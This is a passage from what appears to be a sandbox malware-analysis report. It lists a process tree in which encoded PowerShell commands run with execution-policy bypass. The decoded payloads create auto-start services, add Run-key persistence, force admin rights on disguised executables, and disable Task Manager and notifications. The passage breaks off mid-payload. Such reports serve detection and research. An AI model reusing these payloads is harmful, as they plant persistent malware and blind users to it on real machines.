AGwAYQB5AE4AYQBtAGUAPQAiAFIAZQBtAGUAZAB5ACAAUAByAG8AYwBlAHMAcwBlAHMAIgA7ACAARABlAHMAYwByAGkAcAB0AGkAbwBuAD0AIgBNAGEAbgBhAGcAZQBzACAAYQBuAGQAIABpAG0AcABsAGUAbQBlAG4AdABzACAAUgBlAG0AZQBkAHkAIABQAHIAbwBjAGUAcwBzAGUAcwAgAE0AYQBuAGEAZwBlAHIAIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAOwAgAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQA9ACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAuAGUAeABlACIAfQAKACkACgAKAGYAbwByAGUAYQBjAGgAIAAoACQAcwBlAHIAdgBpAGMAZQAgAGkAbgAgACQAcwBlAHIAdgBpAGMAZQBzACkAIAB7AAoAIAAgACAAIABOAGUAdwAtAFMAZQByAHYAaQBjAGUAIAAtAE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBOAGEAbQBlACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACQAcwBlAHIAdgBpAGMAZQAuAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgAC0AUwB0AGEAcgB0AHUAcABUAHkAcABlACAAIgBBAHUAdABvAG0AYQB0AGkAYwAiACAALQBCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUAIAAkAHMAZQByAHYAaQBjAGUALgBCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUACgB9AAoA
                    6⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:2900
                    • C:\Windows\system32\chcp.com
                      "C:\Windows\system32\chcp.com" 65001
                      7⤵
                        PID:1868
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAYQBwAHAAQwBvAG0AcABhAHQAUABhAHQAaABzACAAPQAgAEAAKAAKAAkAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABkAEkAbABoAG8AcwB0AC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABTAGgAZQBJAGwARQB4AHAAZQByAGkAZQBuAGMAZQBIAG8AcwB0AC4AZQB4AGUAIgAKACkACgAKAGYAbwByAGUAYQBjAGgAIAAoACQAcABhAHQAaAAgAGkAbgAgACQAYQBwAHAAQwBvAG0AcABhAHQAUABhAHQAaABzACkAIAB7AAoAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAJABwAGEAdABoACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKACAAIAAgACAAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACQAcABhAHQAaAAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKACAAIAAgACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACQAcABhAHQAaAAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgAgACAAIAAgAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAkAHAAYQB0AGgAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgB9AAoA
                      6⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:4300
                      • C:\Windows\system32\chcp.com
                        "C:\Windows\system32\chcp.com" 65001
                        7⤵
                          PID:4708
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAcgB1AG4ARQBuAHQAcgBpAGUAcwAgAD0AIABAACgACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAiADsAIABWAGEAbAB1AGUAPQAiACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAFMAaABlAEkAbABFAHgAcABlAHIAaQBlAG4AYwBlAEgAbwBzAHQALgBlAHgAZQAiAH0ACgApAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGUAbgB0AHIAeQAgAGkAbgAgACQAcgB1AG4ARQBuAHQAcgBpAGUAcwApACAAewAKACAAIAAgACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACQAZQBuAHQAcgB5AC4ATgBhAG0AZQAgAC0AVgBhAGwAdQBlACAAJABlAG4AdAByAHkALgBWAGEAbAB1AGUAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKACAAIAAgACAAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACQAZQBuAHQAcgB5AC4ATgBhAG0AZQAgAC0AVgBhAGwAdQBlACAAJABlAG4AdAByAHkALgBWAGEAbAB1AGUAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAJABlAG4AdAByAHkALgBOAGEAbQBlACAALQBWAGEAbAB1AGUAIAAkAGUAbgB0AHIAeQAuAFYAYQBsAHUAZQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAIAAgACAAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAJABlAG4AdAByAHkALgBOAGEAbQBlACAALQBWAGEAbAB1AGUAIAAkAGUAbgB0AHIAeQAuAFYAYQBsAHUAZQAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgB9AAoA
                        6⤵
                        • Adds Run key to start application
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:832
                        • C:\Windows\system32\chcp.com
                          "C:\Windows\system32\chcp.com" 65001
                          7⤵
                            PID:4060
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAdQBzAGgATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBUAG8AYQBzAHQARQBuAGEAYgBsAGUAZAAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIARABXAG8AcgBkACIAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAdQBzAGgATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBUAG8AYQBzAHQARQBuAGEAYgBsAGUAZAAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAHUAcwBoAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIAVABvAGEAcwB0AEUAbgBhAGIAbABlAGQAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAHUAcwBoAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIAVABvAGEAcwB0AEUAbgBhAGIAbABlAGQAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcACIAIAAtAE4AYQBtAGUAIAAiAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiAEgAdwBTAGMAaABNAG8AZABlACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBOAGEAbQBlACAAIgBIAHcAUwBjAGgATQBvAGQAZQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcACIAIAAtAE4AYQBtAGUAIAAiAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiAEgAdwBTAGMAaABNAG8AZABlACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBOAGEAbQBlACAAIgBIAHcAUwBjAGgATQBvAGQAZQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzACIAIAAtAE4AYQBtAGUAIAAiAFMAeQBzAHQAZQBtACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUAVABhAHMAawBNAGcAcgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIARABXAG8AcgBkACIAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUAVABhAHMAawBNAGcAcgAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwAiACAALQBOAGEAbQBlACAAIgBTAHkAcwB0AGUAbQAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAFQAYQBzAGsATQBnAHIAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAFQAYQBzAGsATQBnAHIAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAiACAALQBOAGEAbQBlACAAIgBFAHgAcABsAG8AcgBlAHIAIgAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwARQB4AHAAbABvAHIAZQByACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AQwBlAG4AdABlAHIAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBDAGUAbgB0AGUAcgAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAiACAALQBOAGEAbQBlACAAIgBFAHgAcABsAG8AcgBlAHIAIgAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwARQB4AHAAbABvAHIAZQByACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AQwBlAG4AdABlAHIAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AH